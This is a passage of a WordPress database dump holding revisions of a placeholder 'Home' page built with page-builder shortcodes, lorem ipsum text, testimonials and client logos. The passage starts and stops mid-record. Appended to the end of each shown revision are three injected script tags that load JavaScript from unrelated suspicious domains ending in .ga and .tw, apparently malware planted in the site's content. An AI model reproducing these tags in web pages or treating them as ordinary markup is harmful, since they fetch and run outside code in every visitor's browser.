scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 00:54:27','2018-01-30 00:54:27','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6681,1,'2018-01-30 00:55:33','2018-01-30 00:55:33','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" full_height=\"yes\" columns_placement=\"bottom\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 00:55:33','2018-01-30 00:55:33','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6682,1,'2018-01-30 00:56:55','2018-01-30 00:56:55','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column 